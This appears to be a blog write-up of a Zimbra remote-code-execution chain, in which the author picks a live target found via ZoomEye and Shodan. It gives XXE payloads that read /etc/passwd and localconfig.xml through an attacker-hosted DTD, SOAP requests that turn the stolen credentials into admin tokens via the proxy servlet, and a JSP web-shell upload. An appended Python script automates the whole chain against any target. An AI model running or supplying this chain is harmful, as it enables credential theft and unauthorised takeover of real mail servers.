I had spent ages setting this up locally when the VM suddenly died...
So I went to ZoomEye and Shodan and picked a target instead.
Zimbra's configuration file is conf/localconfig.xml under the Zimbra install directory (/opt/zimbra by default).
The steps below follow the RCE analysis of "A Saga of Code Executions on Zimbra":
https://blog.csdn.net/fnmsd/article/details/88657083
POST /Autodiscover/Autodiscover.xml
Body:
<!DOCTYPE xxe [
  <!ELEMENT name ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
  <Request>
    <EMailAddress>aaaaa</EMailAddress>
    <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
  </Request>
</Autodiscover>
The contents of /etc/passwd come back in the response, which confirms the XXE works.
Next, build a payload to read Zimbra's config file, localconfig.xml.
As the article explains: localconfig.xml is itself XML, so it has to be wrapped in a CDATA section to be read back as text, and because parameter entities cannot be concatenated inside the internal DTD subset, the wrapping has to be done in an external DTD that we host ourselves.
DTD contents:
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
POST /Autodiscover/Autodiscover.xml
Body:
<!DOCTYPE Autodiscover [
  <!ENTITY % dtd SYSTEM "http://<public server>/dtd">
  %dtd;
  %all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
  <Request>
    <EMailAddress>aaaaa</EMailAddress>
    <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
  </Request>
</Autodiscover>
This returns the zimbra account's username and password (the zimbra_user and zimbra_ldap_password values in localconfig.xml).
With those credentials a low-privilege token can be obtained by sending an AuthRequest to the SOAP interface:
POST /service/soap
Body:
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Header>
    <context xmlns="urn:zimbra">
      <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
    </context>
  </soap:Header>
  <soap:Body>
    <AuthRequest xmlns="urn:zimbraAccount">
      <account by="adminName">zimbra</account>
      <password>password obtained in the previous step</password>
    </AuthRequest>
  </soap:Body>
</soap:Envelope>
The response contains the low-privilege token.
Now reach the admin SOAP endpoint (port 7071, normally not exposed to the outside) by going through the proxy servlet:
POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap
Notes:
Set the Host header to the target host with port 7071 appended.
Add a cookie named ZM_ADMIN_AUTH_TOKEN whose value is the token from the previous request.
Send the same body as above, but change the xmlns of AuthRequest to urn:zimbraAdmin; otherwise the token you get back is still an ordinary user token.
This yields the ADMIN_AUTH_TOKEN.
Upload the shell with a Python script:
import requests
import urllib3

urllib3.disable_warnings()  # the target is usually self-signed; verify=False below

# A trivial JSP is enough to confirm execution; swap in a real shell once it works.
file = {
    'clientFile': ("test.jsp", r'<%out.println("test");%>', "text/plain"),
    'requestId': (None, "12", None),
}
headers = {
    "Cookie": "ZM_ADMIN_AUTH_TOKEN=admin_token",  # replace with your own admin token
    "Host": "foo:7071",  # target hostname with the admin port, as in the proxy request
}
r = requests.post("https://xxxx/service/extension/clientUploader/upload",
                  files=file, headers=headers, verify=False)
print(r.text)
Shell path:
https://xxxx/downloads/test.jsp
Requests to the shell must also carry the ADMIN_AUTH_TOKEN cookie.
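The whole chain above, collected into one script as an added example (this is not code from the original post or from Zimbra). It builds each request exactly as described (plain XXE, external DTD with CDATA wrapping, AuthRequest with urn:zimbraAccount and urn:zimbraAdmin, the /service/proxy hop with Host and cookie set, and the multipart clientUploader upload) and parses the replies. ATTACKER_DTD_URL, the base URL passed to run_chain(), and the shape of the reflected error response are assumptions; the builders and parsers run offline, only post() and run_chain() touch the network.

```python
"""Added example, not code from the original post or from Zimbra: helpers for the
XXE -> AuthRequest -> /service/proxy -> clientUploader chain described above.
Builders and parsers run offline; only post() and run_chain() touch the network.
ATTACKER_DTD_URL and the response shapes assumed in the parsers are assumptions."""
import html
import re
import ssl
import uuid
import urllib.request
import xml.etree.ElementTree as ET

AUTODISCOVER_NS = ("http://schemas.microsoft.com/exchange/autodiscover/"
                   "outlook/responseschema/2006a")
ATTACKER_DTD_URL = "http://attacker.example/dtd"  # assumption: where you host the DTD

def xxe_body(doctype: str, entity: str) -> str:
    """Autodiscover request; the server reflects AcceptableResponseSchema back."""
    return (f'<?xml version="1.0"?>{doctype}<Autodiscover xmlns="{AUTODISCOVER_NS}">'
            f"<Request><EMailAddress>aaaaa</EMailAddress><AcceptableResponseSchema>"
            f"&{entity};</AcceptableResponseSchema></Request></Autodiscover>")

def xxe_read(path: str = "/etc/passwd") -> str:
    """Step 1: plain external entity. Fine for text files, breaks on XML files."""
    return xxe_body(f'<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "file://{path}">]>', "xxe")

def external_dtd(path: str = "../conf/localconfig.xml") -> str:
    """Step 2, served at ATTACKER_DTD_URL: CDATA-wrap the file so its tags stay text.
    Joining %start;%file;%end; inside a declaration is only allowed in an external DTD."""
    return ('<!ENTITY % file SYSTEM "file:' + path + '">'
            '<!ENTITY % start "<![CDATA[">'
            '<!ENTITY % end "]]>">'
            '<!ENTITY % all "<!ENTITY fileContents \'%start;%file;%end;\'>">')

def xxe_via_dtd(dtd_url: str = ATTACKER_DTD_URL) -> str:
    """The internal subset only loads the DTD and expands %all; (legal there)."""
    return xxe_body(f'<!DOCTYPE Autodiscover [<!ENTITY % dtd SYSTEM "{dtd_url}">'
                    "%dtd;%all;]>", "fileContents")

def localconfig_creds(response_text: str) -> dict:
    """Locate the reflected <localconfig> dump (unescaping in case the server
    XML-escaped it) and pull the two keys AuthRequest needs."""
    m = re.search(r"<localconfig>.*?</localconfig>", html.unescape(response_text), re.S)
    if not m:
        return {}
    return {k.get("name"): k.findtext("value") for k in ET.fromstring(m.group(0)).iter("key")
            if k.get("name") in ("zimbra_user", "zimbra_ldap_password")}

def auth_request(user: str, password: str, admin: bool = False) -> str:
    """Steps 3 and 4 share this body; only the namespace decides which token comes back."""
    ns = "urn:zimbraAdmin" if admin else "urn:zimbraAccount"
    return ('<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">'
            '<soap:Header><context xmlns="urn:zimbra"><userAgent '
            'name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>'
            f'</context></soap:Header><soap:Body><AuthRequest xmlns="{ns}">'
            f'<account by="adminName">{user}</account><password>{password}</password>'
            "</AuthRequest></soap:Body></soap:Envelope>")

def auth_token(soap_response: str):
    """authToken from an AuthResponse, or None (e.g. a soap:Fault came back)."""
    for el in ET.fromstring(soap_response).iter():
        if el.tag.rsplit("}", 1)[-1] == "authToken":
            return (el.text or "").strip()
    return None

def upload_body(filename: str, content: bytes, boundary: str) -> bytes:
    """multipart/form-data with the clientFile and requestId parts clientUploader expects."""
    return b"\r\n".join([
        f"--{boundary}".encode(),
        f'Content-Disposition: form-data; name="clientFile"; filename="{filename}"'.encode(),
        b"Content-Type: text/plain", b"", content,
        f"--{boundary}".encode(),
        b'Content-Disposition: form-data; name="requestId"', b"", b"12",
        f"--{boundary}--".encode(), b""])

def post(url: str, body: bytes, headers: dict) -> str:
    """HTTPS POST without certificate checks (Zimbra boxes are usually self-signed)."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, context=ssl._create_unverified_context()) as r:
        return r.read().decode(errors="replace")

def run_chain(base: str, dtd_url: str = ATTACKER_DTD_URL) -> str:
    """Run the whole chain against base (e.g. https://mail.example); returns the upload reply."""
    host, xml = base.split("://", 1)[1], {"Content-Type": "text/xml"}
    creds = localconfig_creds(post(f"{base}/Autodiscover/Autodiscover.xml",
                                   xxe_via_dtd(dtd_url).encode(), xml))
    user, pw = creds["zimbra_user"], creds["zimbra_ldap_password"]
    low = auth_token(post(f"{base}/service/soap", auth_request(user, pw).encode(), xml))
    # Hop through /service/proxy to the admin port; the low token goes in the admin cookie.
    admin_hdrs = {**xml, "Host": f"{host}:7071", "Cookie": f"ZM_ADMIN_AUTH_TOKEN={low}"}
    admin = auth_token(post(f"{base}/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",
                            auth_request(user, pw, admin=True).encode(), admin_hdrs))
    boundary = uuid.uuid4().hex
    up_hdrs = {"Content-Type": f"multipart/form-data; boundary={boundary}",
               "Host": f"{host}:7071", "Cookie": f"ZM_ADMIN_AUTH_TOKEN={admin}"}
    return post(f"{base}/service/extension/clientUploader/upload",
                upload_body("test.jsp", b'<%out.println("test");%>', boundary), up_hdrs)
```

Serve external_dtd() at ATTACKER_DTD_URL first, then call run_chain("https://target"). auth_token() returns None instead of raising when the server answers with a soap:Fault, so a wrong password or a token that is still user-level (the urn:zimbraAccount/urn:zimbraAdmin mix-up the post warns about) shows up at the step where it happens rather than as a confusing upload failure.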
I didn't get this part to work.
So I have to build it locally after all; I'm using Ubuntu 14.04.
Setting up Zimbra is fairly involved, so here is a good write-up on it:
https://www.jianshu.com/p/722bc70ff426